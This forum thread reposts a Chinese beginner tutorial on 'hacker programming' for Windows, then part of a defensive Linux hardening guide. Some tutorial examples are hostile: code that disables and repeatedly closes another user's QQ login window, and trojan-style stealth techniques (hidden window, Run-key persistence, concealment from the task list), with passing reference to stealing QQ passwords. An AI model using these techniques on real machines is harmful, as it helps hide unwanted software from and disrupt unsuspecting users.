  在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件”。系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。每个Windows 应用程序都是基于事件和消息的,而且包含一个主事件循环,它不停地、反复地检测是否有用户事件发生。每次检测到一个用户事件,程序就对该事件做出响应,处理完再等待下一个事件的发生。
  Windows 下的应用程序不断地重复这一过程,直至用户终止程序,用代码来描述实际上也就是一个消息处理过程的while循环语句。
  下面便简单介绍一下与 Windows 系统密切相关的几个基本概念:

  ⒈窗口:这是我要说的第一个概念。似乎是地球人都知道的事儿了,窗口是Windows本身以及Windows 环境下的应用程序的基本界面单位,但是很多人都误以为只有具有标题栏、状态栏、最大化、最小化按钮这样标准的方框才叫窗口。其实窗口的概念很广,例如按钮和对话框等也是窗口哦,只不过是一种特殊的窗口罢了。
  从用户的角度看,窗口就是显示在屏幕上的一个矩形区域,其外观独立于应用程序,事实上它就是生成该窗口的应用程序与用户间的直观接口;从应用程序的角度看,窗口是受其控制的一部分矩形屏幕区。应用程序生成并控制与窗口有关的一切内容,包括窗口的大小、风格、位置以及窗口内显示的内容等。用户打开一个应用程序后,程序将创建一个窗口,并在那里默默地等待用户的要求。每当用户选择窗口中的选项,程序即对此做出响应。

  ⒉程序:通常说的程序都是指一个能让计算机识别的文件,接触得最多的便是.exe型的可执行文件,这个不难理解。

  ⒊进程:说到进程,学过《操作系统》的人都很清楚,所谓进程就是应用程序的执行实例(或称一个执行程序)。需要注意的是:进程是程序动态的描述,而上面说到的程序是静态的描述,两者有本质的区别。举个例子,从网上Down了一个瑞星杀毒软件到C盘但没有运行,那个.exe 可执行文件叫做程序,它是一个二进制码的文件。一旦双击了exe文件图标运行程序,那个“正在运行着的瑞星杀毒”便称为进程,它在双击的那一刻被系统创建,当你关机或者在任务栏的图标上单击鼠标右键选“退出”时,进程便消亡,彻底结束了生命。进程经历了由“创建”到“消亡”的生命期,而程序自始至终存在于你的硬盘上,不管你的机器是否启动。

  ⒋线程:线程是进程中的一个执行单元,同一个进程中的各个线程对应于一组CPU指令、一组CPU寄存器以及一堆栈。进程本来就具有动态的含义,然而实质上是通过线程来执行体现的,从这个意义上说,Windows 中进程的动态性意义已经不是很明显了,只算是给程序所占的资源划定一个范围而已(个人观点,纯属个人理解,不必引起争议!),真正具有动态性意义的是线程。以前在大二学习操作系统课的时候就有个同学跟笔者提起这点,笔者还跟他驳得面红耳赤呢!现在想想,觉得很有道理,不得不佩服那位同学对Windows内部机制了解得如此清楚。
  之所以在此花那么多的篇幅说线程,是因为下面将要介绍到多线程编程技巧,如果不理解这点,那就很难应用到实践上,希望大家明白。

  ⒌消息:我们几乎做每一个动作都会产生一个消息,在用鼠标指点江山的今天,鼠标被移动会产生WM_MOUSEMOVE消息,鼠标左键被按下会产生WM_LBUTTONDOWN的消息,鼠标右键按下便产生WM_RBUTTONDOWN消息等等。所有的这些都可以通过GetMessage,SendMessage等函数得到,以后的操作中我们会经常接触到这些函数。

  ⒍事件:何谓事件?从它的字面意思我们就可以明白它的含义,如在程序运行的过程中改变窗口的大小或者移动窗口等,都会触发相应的“事件”。

  ⒎句柄:单单一个“柄”字便可以解释它的意思了,我们天气热摇扇子的时候只要抓住扇柄便可以控制整个扇子的运动了,在程序中也差不多是这个意思。通常一个句柄就可以传递我们所要做的事情。有经验的读者肯定清楚,编写程序总是要和各种句柄打交道的,句柄是系统用来标识不同对象类型的工具,如窗口、菜单等,这些东西在系统中被视为不同类型的对象,用不同的句柄将他们区分开来。
  看看C++ 教材中是如何给句柄下定义的:“在Win32里,句柄是指向一个无值型对象(void *)的指针,是一个4字节长的数据”。虽然我对它的本质是什么还是很迷惑,但我知道句柄并不是一个真正意义上的指针。从结构上看,句柄的确是一个指针,尽管它没有指向用于存储某个对象的内存位置(很多书都这么说,这正是我的迷惑所在),而实际上句柄指向的是一个包含了对该对象进行的引用的位置。在编程时,只要抓住了对象的句柄就可以对该对象进行操作了(我在《一个简单木马程序的编写与伪装策略》中说到的对QQ密码的截获就是要找到QQ登陆窗口的句柄后才开始截密行动的)。下面再举个例子来说明句柄的运用:编一个程序,使QQ登陆窗口的号码框和密码框均变黑,相关代码及解释:
void __fastcall TForm1::FormCreate(TObject *Sender)
{
HWND hCurWindow,HC,HE;//定义三个窗口句柄变量,hCurWindow用于存放QQ用户登陆窗口的句柄,HC、HE分别存放号码框和密码框的句柄。
if((hCurWindow= FindWindow(NULL,"QQ用户登录"))!=0||(hCurWindow=FindWindow(NULL,"OICQ用户登录"))!=0)
{//很明显,调用FindWindow()函数去获得QQ登陆窗口的句柄
String str;
str.sprintf("0x%x",hCurWindow);
}
TCHAR wClassName[255];//类名变量
HC=GetWindow(hCurWindow, GW_CHILD);//得到号码框的句柄
HE=GetWindow(HC, GW_HWNDNEXT);//接着得到密码框的句柄
GetClassName(HE, wClassName, sizeof(wClassName));//得到类名
GetClassName(HC, wClassName, sizeof(wClassName));//得到类名
EnableWindow(HE,false);//使窗口失效
EnableWindow(HC,false);//使窗口失效
}
  以上代码在C++ Builder下编译通过,只要运行次程序,QQ登陆窗口的号码框和密码框马上变黑色,如图1所示,无非是EnableWindow()函数所起的作用。

图1
  你还可以添加一个Timer控件,将上面的代码copy到void __fastcall TForm1::Timer1Timer(TObject *Sender)函数中,并在后边加上这一句代码:
SendMessage(hCurWindow,WM_CLOSE,0,0); 使QQ一启动就关闭,让别人永远也用不了QQ,挺有趣儿的哦&#61514;,(请参考光盘内的程序一)

  ⒏API与SDK:API是英文 Application Programming Interface 的简称,意为“应用程序接口”,泛指系统为应用程序提供的一系列接口函数。其实质是程序内的一套函数调用,在编程的时候可以直接调用,而不必知道其内部实现的过程,只知道它的原型和返回值就可以了,此外,手头经常放着一本“Windows API大全”之类的书也是必不可少的,不然你根本不知道哪些API是干什么用的,瞎编也编不出什么东西来。在后面我们会介绍调用API编程的例子,调用API编程工作虽然烦琐,但由于API函数都被封装在dll库里,程序只有在运行的时候才调用的,因此程序的体积小而且运行效率高。
  SDK是英文 Software Development Kit 的缩写,指“软件开发工具包”,在防火墙的设计中就经常涉及到SDK。
  有关基本的概念就谈这些,那些C/C++的基本语法、什么是面向对象等知识请大家查阅相关的书,此类书籍各大书店已汗牛充栋,不再多叙。下面直接谈谈语种和编程工具的选择问题,这也是初学者们最迷惑的问题。

  二、编程语言以及工具的选择:
  从上面的介绍我们对Windows 有了进一步的了解,现在就该开始行动了,选择要学的语言和工具是第一步,而且是非常重要的一步工作,笔者建议一切以简单、易接受为原则,不然你会自信心大减的,何必偏要跟自己过不去自讨苦吃呢?
  在开始的时候很多人都感到迷惑,目前的编程语言那么多,有c、c++、c#、java、汇编、html等等,究竟学哪些好呢?最开始我该学什么呢?甚至有人将vc、c++ builder也列为两种不同的语言!这些都是对编程语言缺乏了解造成的。笔者开始的时候也犯过同样的错误,曾经给自己写过一份计划书:先学c语言,接着学c++、c#、java、汇编、vb、vc、c++ builder……,哪一种语言用多少时间去专攻等等,现在回想起来觉得多么的可笑!只要学得精,一门就够了。从实用的角度来讲,C++ 是最好的选择(个人意见,其实每一种语言都很好),而VC和C++ Builder是其相应开发工具的两大主流,笔者极力推荐初学者使用C++ Builder,因为很容易上手,如果一下子就用VC的话,也许会打击你的自信心:)。
  三、谈谈促进编程能力提高的两个途径
  如果你是一个黑客技术的狂热者的话,到雅虎去搜索黑客教程的时候就会发现,很多的中文教程在谈到如何进行黑客编程时,十有八九都会介绍以下两大最佳途径:一、读程序;二、写程序,并且都提出了教程作者的看法,下面我想谈谈这方面的个人观点。
  ⒈读程序:我将读程序放在前面是有原因的。在你没有阅读过一份完整的源代码之前,你别指望能写出有多好的程序来!这是对每一位初学者的忠告也是警告,而且必须具备一定的语言基础知识,这里的基础知识主要是指语法知识,最起码要能读懂别人的程序的每一行意思。有没有程序的设计思想,在这个时期并不重要,只要具备一定的语法基础就可以了,思想可以通过阅读完别人的源程序后分析得来。
  记得在大一学习C语言的时候,我们都很重视语法的学习,整天都看教材、做练习,而且赶在老师的讲课前预习,课后又复习巩固,将一些语法点记得滚瓜烂熟,可后来一到做课程设计的时候,坐在电脑面前简直是老鼠拖鸡蛋―无从下手了,而且不断的问自己:“我平时的努力哪去了?语法都会了呀,怎么还是做不出程序来?”相信很多人都像笔者以前那样,错误地以为学会了语法就等于掌握了编程。
编程的能力包括经验、技巧、耐心等几个因素,而并非想象中的那样简单,更不要以为编程就是简简单单的写程序!
  其实学一门语言并不需要刻意去记那些条条框框的语法,在看代码的时候,遇到了不明白的地方再去查相关的资料,一点一点补充基础知识再配合源程序的思路,这时的理解才是最深刻的,我可以肯定地说,这个时候对语法的接受程度绝对比你刚开始时的死记要强!
  读程序也不能单纯地读,要真正做到“俯而读,昂而思”。好的代码是百读不厌的,比如Shotgun的那道构造洪水Ping攻击的代码,我至少读了20遍。笔者喜欢将从网上搜集来的代码打印到纸上(尽管学校的打印费贵得要命,打一份代码就得花去十几块甚至几十块大洋~~~),然后边看边做好眉批,遇到一个新函数记下它的功能,一些忘记了的知识在旁边标出来,还可以写上对程序的看法等等。特别是遇到了一些新的API函数,最好标出来,对你以后编程的时候也许会用得着,最后别忘了分析一下程序的思路,这样对你以后编写类似的程序很有帮助的。

  ⒉写程序:问题可谈到点子上了,学那么多语言,读那么多程序最终还不是为了写程序,做出适合需要的软件来?“君子性非异也,善加于物也”,笔者认为一切从借鉴开始,先是修改别人的程序,等到有了一定的程度再写出属于自己的程序。
  刚开始写程序,不要奢望一下子写出很出色的程序来,“万丈高楼平底起”,编程贵在动手,只要你动手去写了,就算只有一句“printf(“Hello!”);”也是一次进步!此外,还要依照自身的能力循序渐进地写,开始的时候写一点功能简单的、篇幅短小的代码,力求简洁、完整,“麻雀虽小,但五脏俱全”,然后在此基础上进行扩充,一点一点添加功能,下面笔者摘录一位国内一流编程高手、“豪杰超级解霸”的作者梁肇新的编程心得,请大家看看一个成功的程序员是如何写程序的,希望对广大菜鸟有所启发:
  写程序的方法:在Win98的环境中,先写主干,用最少的代码实现最基本的功能。然后一点点添加功能,每加一点都要调试。尽量少用动态分配、全局变量。充分利用操作系统直接提供的API。在Win98下调试通过之后,再在Win95下调试通过,然后是Win97,WindowsME,WinNT4.0。这样才能写出稳定、快速的程序。
  给程序员的建议:1、不要急于求成,这样往往欲速不达。2、不要什么东西都想学,什么都没掌握。3、每天都要自我总结,分析自己的错误率和废码率,不断加强自我管理。4、代码格式很重要。代码要规范、严谨,效率要高。5、不要盲从简单的开发工具(这点笔者不是很同意,最起码要有一定的功底的人才敢这么说)。6、有了成果要公开,不要舍不得,不然很快会过时的(以上两段摘自《程序员》增值合订本2001.上册P18,请读者前往参考)。

参考书籍:
《Windows C 程序设计》,清华大学出版社
《超级解霸梁肇新》,《程序员》合订本
声明:本文为劲风原创文章,来源 www.cngale.com,并已在《黑客防线》增刊上发表,转载请注明出处。


B27层 发表时间: 11/10 20:31

回复: mingming8 [mingming8]   论坛用户   登录
Windows黑客编程基础(下)
发布: 劲风 日期: 10-23 类别: 新手上路 今日/总浏览: 18/2261 

           Windows黑客编程基础(下)
  四、黑客编程的几个基本技巧
  以下将要谈到的几个基本技巧很重要,虽然对于编程高手来说这是在玩小孩子把戏,但对于一位初学者,掌握以下几个技巧将为你的编程扫清道路,而且很容易编写出有趣的程序,培养你对编程的兴趣。
  技巧⒈学会修改注册表。
  相信大家都知道当浏览了一些网页恶意代码,IE标题、默认主页等被改得面目全非,这就是通过改动注册表来更改系统设置的例子。Windows中的注册表是个好东东,它是windows系统的灵魂,是许多软件记录数据的地方(当然也包括windows本身)。windows通过它记录大量的数据,然后在下一次启动时再读取相应的数据来设置系统。通过控制注册表就可以控制整个系统,所以很多的黑客程序都在注册表上动手脚(尤其是木马程序和作恶剧程序),学会修改注册表可以实现一些有趣而强大的功能。我们完全可以通过编程来操作注册表,达到与手动更改注册表编辑器产生一样的效果。“超级兔子”中的大部分功能就是通过修改注册表来完成的。操作注册表有专门的API函数,大家可以参考有关资料,下面笔者以C++ Builder为例说明如何在程序中操作注册表:
  程序二:编程修改IE标题内容
  新建一个工程,在Unit1.h文件中包含Registry单元:
#include <Registry.hpp>
然后就可以在.cpp文件操作注册表了,接着来!在窗体的OnCreate()里加入以下代码(你可以在try{}里面加入任何操作注册表的代码):
TRegistry* Registry;
Registry = new TRegistry();创建一个TRegistry类型的对象Registry,用于修改注册表。
try{
Registry->RootKey = HKEY_CURRENT_USER;//设置主键,这是必不可少的,设置好主键后,就可以操作这个主键下所有的键值了。
if( Registry->OpenKey("Software\\Microsoft\\Internet Explorer\\Main",FALSE))//调用OpenKey()打开括号里所指的键
{
Registry->WriteString("Window Title",”台湾是中国的一部分,世界上只有一个中国!”);//调用WriteString()往注册表里写入IE标题
Registry->CloseKey();//关闭该键
}
else
{//如果打开失败的话
Registry->CreateKey("Software\\Microsoft\\Internet Explorer\\Main");//就调用CreateKey()新建上述键
Registry->WriteString("Window Title","台湾是中国的一部分,世界上只有一个中国!");//再写入IE标题内容
Registry->CloseKey();//最后关闭该键,这个也不能忽视,它跟上面的OpenKey成对使用的
}//End of try
__finally
{//要是出错,跳到这里处理
Registry->CloseKey();//关闭所要打开的键
delete Registry;//销毁Registry对象,释放资源。
}
  编译运行上面的代码就可以将IE的标题改为“台湾是中国的一部分,世界上只有一个中国!”了。笔者写了个小程序,可以测出当前的IE标题和默认主页是什么,并可随意修改他们,还可以禁止别人修改你的默认主页和注册表编辑器,运行界面如图2所示(详细的代码请参考黑防的光盘)。

图2
  技巧⒉调用API编程
  其实这是最简单的,API是系统在DLL里为我们提供的程序接口,可以直接调用的。只要我们有一本《Windows API大全》之类的书就足够了,下面举个简单的例子:
  程序三:调用API函数隐藏Windows的任务栏:
HWND WndHandle;//定义句柄类型变量
WndHandle=FindWindow("Shell_TrayWnd",NULL);//调用API函数FindWindow()获得任务栏的句柄
ShowWindow(WndHandle,SW_HIDE);//再调用API函数ShowWindow()隐藏任务栏
  大家看到,在上面调用API函数FindWindow()和ShowWindow()的过程中,只要我们知道函数的名字和括号里的参数是什么就行了,至于实现的过程不必理会,也轮不到我们这些菜鸟去理会:)学会调用API,你可以写出功能强大的程序来,这一技巧对于初学者来说是必须掌握的(代码请参考黑防光盘)。
  技巧⒊多线程编程技术
  通过上一篇的介绍 ,大家都很清楚线程的概念了,它是进程内部的一个执行单元(如一个函数等),上期说了那么多理论,现在该派上用场了。编写多线程应用程序是指使程序在运行时创建多个线程并发地运行于同一个进程中。今年6月份横空出世的“中国黑客”病毒不是采用了全球独创的“三线程技术”吗?虽然笔者没机会分析它的样本代码,但此种病毒的工作效率如此之高是与它的多线程技术分不开的。
  使用多线程技术编程有如下优点:
  ①提高CPU的利用率。由于多线程并发运行,可以使用户在做一件事情的时候还可以做另外一件事。特别是在多个CPU的情况下,更可以充分地利用硬件资源的优势:将一个大任务分成几个小任务,由不同的CPU来合作完成。
  ②采用多线程技术,可以设置每个线程的优先级,调整工作的进度。
清楚了使用多线程技术的优势之后,下面便来谈谈如何在C++ Builder环境下开发多线程的应用程序,在C++ Builder 环境中,通过 TThread 类就可以很方便地编写多线程应用程序(但不能直接使用,因此要派生新类),具体流程如下:
  从TThread 类派生出一个新的线程类->创建线程对象->设置线程对象的属性项->挂起或唤醒线程(根据具体情况操作)->结束线程。
  要说明一点的是:在应用程序中要合理地设置线程的优先级。不要因为某些线程的优先级很高而使其他一些线程因为等不到CPU的处理时间而被“饿死”,也不要因为线程的级别都差不多而导致的频繁切换花费大量的CPU时间。(本段引自《C++ Builder 5 编程实例与技巧》P284)。
  技巧⒋让程序实现后台监控
  这是一个很基本的技巧。如果你是一个木马程序的爱好者,当你阅读众多的木马源程序的时候,就会发现100%的木马程序都很注意自身的后台监控本领,也就是隐身技术,面对不同的系统要施展不同的对策才能实现。很多杀毒程序就采用了这种后台监控技术,使程序随着系统的启动而运行,然后在后台悄悄地监视系统的一举一动,一发现有不对路的程序就把它“揪”出来示众。实现程序的后台监控技术有如下几个关键:
  ①正常运行时,不显示程序的窗体;
  ②系统每次启动都自动运行程序一次;
  ③程序图标不显示在任务栏上;
  ④不显示在按Ctrl+Alt+Del 调出的任务列表中;
  ⑤通过热键可以调出隐藏的窗体
  实现方法:对于①,要不显示窗体,我们可以编辑WinMain函数,设置ShowMainForm值为False就可以隐藏程序的窗体了。参考代码:Application->ShowMainForm = false ;对于②,可以利用技巧1所介绍的方法修改注册表,键值如下:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ,使用的是WriteString()方法。这是冰河等多种旧木马惯用的启动手段之一(当然还有文件关联、注入dll等方法);对于③,要使程序图标不显示在任务栏上,也很简单,调用API函数SetWindowLong 可以让程序运行后不出现在任务栏里,不过要放在窗体的OnCreate()里面。代码如下:
SetWindowLong(Application->Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);
对于④,调用RegisterServiceProcess API 函数将程序注册成为一个服务模式程序,让它运行在较高的优先级下,就不会出现在程序列表中(对Win9X有效,WinNT/2000/XP下无效)。具体的代码请参考笔者的《一个简单木马程序的编写与伪装策略》一文,不在此重叙(请参考《黑客防线》2002年第6期)。对于⑤,要先定义捕获Windows消息WM_HOTKEY的钩子函数,然后向Windows加入一个全局原子,并保留其句柄,最后向Windows登记热键,这个可以调用API函数RegisterHotKey来实现。
  技巧⒌使用定时触发器
  在C++ Builder 环境下,定时触发器即Timer控件,有时候我们希望程序隔一段时间重复执行相同的动作,比如对QQ密码截获的时候,就要隔一段间隔寻找一次QQ登录窗口。在C++ Builder 中,只要将执行这些动作的代码放到一个Timer中去就OK了。
  听说“中国黑客”病毒运行几分钟后就自动创建一个新的线程,用于寻找OICQ的“发送消息”窗口,在10分钟内一直在找,一旦找到就将“去***法轮功”等带有政治色彩的言论发送给受害者QQ上的好友,10分钟后自动结束该线程。我想在查找“发送消息”窗口的10分钟内就运用了定时器,该病毒是用汇编开发的。可是在C++ Builder中是如何运用的呢?其实控件的出现使得编程变得很简单,添加一个Timer控件,设置几下控件的属性,双击Timer控件,将代码放到里面去就行了。程序执行的时候,相隔指定的时间就重复执行里面的代码了。实际上笔者在上一期的“程序一”中寻找QQ登录窗口时,就运用了定时器,请读者参考光盘中的源程序。
  有关编程技巧的介绍到此为止,请读者参考另类书籍,掌握更多的黑客编程技巧,编写出受欢迎的黑客程序来。
  五、Socket 编程与网络通信基础
由于本文的主题是“黑客编程基础”,而黑客是互连网上“来无影,去无踪”的黑衣人,如冰河、网络神偷等黑客程序都是基于互连网的,谈黑客编程离开网络编程就会大失其味。所以,下面接着谈谈网络编程,大凡基于网络应用的程序都离不开Socket。
  Socket 为套接字之意,是作为计算机与计算机之间通信的接口。有关Socket的概念在第6期《黑客防线》的《Socket 编程的基础和基本过程》一文中有详细的描述,请大家参考,不在此多叙。需要指出的是:Winsock是访问众多的基层网络协议的一种接口,在每个Win32平台上,它都以不同的形式存在着,Winsock 是网络编程的接口,不是协议,这是容易弄错的地方。
  现在来谈谈Winsock 编程的过程,大凡在Win32平台上的Winsock编程都要经过下列的基本步骤:定义变量->获得Winsock版本->加载Winsock库->初始化->创建套接字->设置套接字选项->关闭套接字->卸载Winsock库,释放所有资源。
  下面以一道极其简单的程序来说明如何进行Winsock编程。程序四:编一个程序来获取本地机器的IP地址。
  使用Winsock提供的API函数是最基本的网络技术,为了给初学者看个清楚,笔者打算在Visual C++ 和C++ Builder下各写一个,便于大家区分这两种不同的编程工具的特性(对于本程序来说,他们都差不多,而对于某些通信程序,他们实现起来就相差很远了,但本质是差不多的)。先来看Visual C++ 下的源程序,实现步骤:打开Visual C++ ,从“File”菜单中的“New”新建一个工程,选中“Win 32 Console Application”,意思是说生成的是Win32的控制台程序。另外,初学者要注意一点:只要程序中用到了 Winsock API 函数,都要在工程设置的 Link 中增加 Ws2_32.lib 文件,不然程序将不能通过编译,方法是:点击“Project”菜单,选择“Settings... ALT+F7” ,在弹出的“Project Settings”对话框右侧选“Link”标签,再在“Project Options”下方的编辑框中增加Ws2_32.lib文件,点“OK”就可以了。
  加载好文件之后,就可以在CheckIP.cpp文件里加入以下代码了:
//-------Begin from ------------
//包含需要使用的头文件
#include "stdafx.h"
#include "windows.h"
#include <winsock.h>
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
void CheckIP(void) //定义CheckIP()函数,用于获取本机IP地址
{
WORD wVersionRequested;// WORD类型变量,用于存放Winsock版本的正确值
WSADATA wsaData;
char name[255];//定义用于存放获得的主机名的变量
CString ip;//定义IP地址变量
PHOSTENT hostinfo;
wVersionRequested = MAKEWORD( 2, 0 );
//调用MAKEWORD()获得Winsock版本的正确值,用于下面的加载Winsock库
if ( WSAStartup( wVersionRequested, &wsaData ) == 0 ) {
//现在是加载Winsock库,如果WSAStartup()函数返回值为0,说明加载成功,程序可以继续往下执行
if( gethostname ( name, sizeof(name)) == 0) {
//如果成功地将本地主机名存放入由name参数指定的缓冲区中
if((hostinfo = gethostbyname(name)) != NULL) {
//这是获取主机名,如果获得主机名成功的话,将返回一个指针,指向hostinfo,hostinfo为PHOSTENT型的变量,下面即将用到这个结构体
LPCSTR ip = inet_ntoa (*(struct in_addr *)*hostinfo->h_addr_list);
//调用inet_ntoa()函数,将hostinfo结构变量中的h_addr_list转化为标准的点分表示的IP地址(如192.168.0.1)
printf("%s\n",ip);//输出IP地址 } }
WSACleanup( );//卸载Winsock库,并释放所有资源 } }
int main(int argc, char* argv[])//主函数,程序的入口
{
CheckIP();//调用CheckIP()函数获得、输出IP地址
return 0;//由于main()定义为int型,所以应带回一个int型的数值
}
程序运行界面如图3所示:

图3
  下面接着来看看在C++ Builder 下如何实现,其实两者的思想是一样的,只是在C++ Builder下实现的界面友好点而已,实现方法:打开C++ Builder 5,默认情况下已经新建一个工程,保存这个工程文件就可以了,构造如下面图4所示的界面,在相应之处添入下面的代码即可。
程序代码:
//包含头文件
#include <vcl.h>
#include <WINSOCK2.H>
#pragma hdrstop
#include "Unit1.h"
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{ }
void TForm1::GetHostIpAddress()
{// GetHostIpAddress()获得本机IP地址
struct hostent *thisHost;
struct in_addr in;
char MyName[80];
char *ptr;
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if( err != 0 )
return;
if(LOBYTE( wsaData.wVersion ) != 2 ||
HIBYTE( wsaData.wVersion ) != 0 )
{ WSACleanup( );
return; }
if(gethostname(MyName,80)==SOCKET_ERROR)
return;
if(!(thisHost=gethostbyname(MyName)))
return;
memset((void *)&in,sizeof(in),0);
in.s_addr=*((unsigned long *)thisHost->h_addr_list[0]);
if(!(ptr=inet_ntoa(in)))
return;
WSACleanup( );
Edit1->Text=AnsiString(ptr);}
void __fastcall TForm1::FormCreate(TObject *Sender)
{ GetHostIpAddress();}
void __fastcall TForm1::Button1Click(TObject *Sender)
{Close();//添加一个“确定”按钮,点击即关闭程序。}
  程序在 C++ Builder 5 下编译通过,运行界面如图4所示。通过比较你会发现他们是大同小异的,对于同一程序,两者工具各有秋千,至于选择哪种由你决定,最好是两者相得益彰。

图4
  “临渊羡鱼,不如退而结网”,虽说“通往电脑的路不止一条”,然而对于编程,道路却只有一条,就是:动手去做,亲身实践。
  兄弟,愿你成为一个出色的舵手,用代码去驽驾电脑的世界,用编程去填充七彩的人生!
参考书籍:
《C++ Builder 5 编程实例与技巧》,机械工业出版社
《WIN 编程须知》,病毒兄的作品,再次感谢病毒兄

声明:本文为劲风原创文章,来源 www.cngale.com,并已在《黑客防线》增刊上发表,转载请注明出处。


B28层 发表时间: 11/10 20:32

回复: mingming8 [mingming8]   论坛用户   登录
保Linux安全的十招 确
发布: 艰苦 日期: 11-05 类别: 新手上路 今日/总浏览: 8/1454 

Linux不论在功能上、价格上或性能上都有很多优点,然而,作为开放式操作系统,它不可避免地存在一些安全隐患。关于如何解决这些隐患,为应用提供一个安全的操作平台,本文会告诉你一些最基本、最常用,同时也是最有效的招数。
Linux是一种类Unix的操作系统。从理论上讲,Unix本身的设计并没有什么重大的安全缺陷。多年来,绝大多数在Unix操作系统上发现的安全问题主要存在于个别程序中,所以大部分Unix厂商都声称有能力解决这些问题,提供安全的Unix操作系统。但Linux有些不同,因为它不属于某一家厂商,没有厂商宣称对它提供安全保证,因此用户只有自己解决安全问题。
Linux是一个开放式系统,可以在网络上找到许多现成的程序和工具,这既方便了用户,也方便了黑客,因为他们也能很容易地找到程序和工具来潜入Linux系统,或者盗取Linux系统上的重要信息。不过,只要我们仔细地设定Linux的各种系统功能,并且加上必要的安全措施,就能让黑客们无机可乘。
一般来说,对Linux系统的安全设定包括取消不必要的服务、限制远程访问、隐藏重要资料、修补安全漏洞、采用安全工具以及经常性的安全检查等。本文教你十种提高Linux系统安全性的招数。虽然招数不大,但招招奏效,你不妨一试。

第1招:取消不必要的服务
早期的Unix版本中,每一个不同的网络服务都有一个服务程序在后台运行,后来的版本用统一的/etc/inetd服务器程序担此重任。Inetd是Internetdaemon的缩写,它同时监视多个网络端口,一旦接收到外界传来的连接信息,就执行相应的TCP或UDP网络服务。
由于受inetd的统一指挥,因此Linux中的大部分TCP或UDP服务都是在/etc/inetd.conf文件中设定。所以取消不必要服务的第一步就是检查/etc/inetd.conf档,在不要的服务前加上“#”号。
一般来说,除了http、smtp、telnet和ftp之外,其它服务都应该取消,诸如简单文件传输协议tftp、网络邮件存储及接收所用的imap/ipop传输协议、寻找和搜索资料用的gopher以及用于时间同步的daytime和time等。
还有一些报告系统状态的服务,如finger、efinger、systat和netstat等,虽然对系统查错和寻找用户非常有用,但也给黑客提供了方便之门。例如,黑客可以利用finger服务查找用户的电话、使用目录以及其它重要信息。因此,很多Linux系统将这些服务全部取消或部分取消,以增强系统的安全性。
Inetd除了利用/etc/inetd.conf设置系统服务项之外,还利用/etc/services档查找各项服务所使用的埠。因此,用户必须仔细检查该文件中各埠的设定,以免有安全上的漏洞。
在Linux中有两种不同的服务型态:一种是仅在有需要时才执行的服务,如finger服务;另一种是一直在执行的永不停顿的服务。这类服务在系统激活时就开始执行,因此不能靠修改inetd来停止其服务,而只能从修改/etc/rc.d/rc[n].d/�n或用Run��level��editor去修改它。提供档服务的NFS服务器和提供NNTP新闻服务的news都属于这类服务,如果没有必要,最好取消这些服务。

第2招:限制系统的出入
在进入Linux系统之前,所有用户都需要登录,也就是说,用户需要输入用户帐号和密码,只有它们通过系统验证之后,用户才能进入系统。
与其它Unix操作系统一样,Linux一般将密码加密之后,存放在/etc/passwd�n中。Linux系统上的所有用户都可以读到/etc/passwd�n,虽然文件中保存的密码已经经过加密,但仍然不太安全。因为一般的用户可以利用现成的密码破译工具,以穷举法猜测出密码。比较安全的方法是设定影子档/etc/shadow,只允许有特殊权限的用户阅读该文件。
在Linux系统中,如果要采用影子档,必须将所有的公用程序重新编译,才能支持影子档。这种方法比较麻烦,比较简便的方法是采用插入式验证模块(PAM)。很多Linux系统都带有Linux的工具程序PAM,它是一种身份验证机制,可以用来动态地改变身份验证的方法和要求,而不要求重新编译其它公用程序。这是因为PAM采用封闭包的方式,将所有与身份验证有关的逻辑全部隐藏在模块内,因此它是采用影子档案的最佳帮手。
此外,PAM还有很多安全功能:它可以将传统的DES加密方法改写为其它功能更强的加密方法,以确保用户密码不会轻易地遭人破译;它可以设定每个用户使用计算机资源的上限;它甚至可以设定用户的上机时间和地点。
Linux系统管理人员只需花费几小时去安装和设定PAM,就能大大提高Linux系统的安全性,把很多攻击阻挡在系统之外。

第3招:保持最新的系统核心
由于Linux流通渠道很多,而且经常有更新的程序和系统补丁出现,因此,为了加强系统安全,一定要经常更新系统内核。
Kernel是Linux操作系统的核心,它常驻内存,用于加载操作系统的其它部分,并实现操作系统的基本功能。由于Kernel控制计算机和网络的各种功能,因此,它的安全性对整个系统安全至关重要。
早期的Kernel版本存在许多众所周知的安全漏洞,而且也不太稳定,只有2.0.x以上的版本才比较稳定和安全,新版本的运行效率也有很大改观。在设定Kernel的功能时,只选择必要的功能,千万不要所有功能照单全收,否则会使Kernel变得很大,既占用系统资源,也给黑客留下可乘之机。
在Internet上常常有最新的安全修补程序,Linux系统管理员应该消息灵通,经常光顾安全新闻组,查阅新的修补程序。

第4招:检查登录密码
设定登录密码是一项非常重要的安全措施,如果用户的密码设定不合适,就很容易被破译,尤其是拥有超级用户使用权限的用户,如果没有良好的密码,将给系统造成很大的安全漏洞。
在多用户系统中,如果强迫每个用户选择不易猜出的密码,将大大提高系统的安全性。但如果passwd程序无法强迫每个上机用户使用恰当的密码,要确保密码的安全度,就只能依靠密码破解程序了。
实际上,密码破解程序是黑客工具箱中的一种工具,它将常用的密码或者是英文字典中所有可能用来作密码的字都用程序加密成密码字,然后将其与Linux系统的/etc/passwd密码文件或/etc/shadow影子文件相比较,如果发现有吻合的密码,就可以求得明码了。
在网络上可以找到很多密码破解程序,比较有名的程序是crack。用户可以自己先执行密码破解程序,找出容易被黑客破解的密码,先行改正总比被黑客破解要有利。

第5招:设定用户帐号的安全等级
除密码之外,用户帐号也有安全等级,这是因为在Linux上每个帐号可以被赋予不同的权限,因此在建立一个新用户ID时,系统管理员应该根据需要赋予该帐号不同的权限,并且归并到不同的用户组中。
在Linux系统上的tcpd中,可以设定允许上机和不允许上机人员的名单。其中,允许上机人员名单在/etc/hosts.allow中设置,不允许上机人员名单在/etc/hosts.deny中设置。设置完成之后,需要重新激活inetd程序才会生效。此外,Linux将自动把允许进入或不允许进入的结果记录到/rar/log/secure文件中,系统管理员可以据此查出可疑的进入记录。
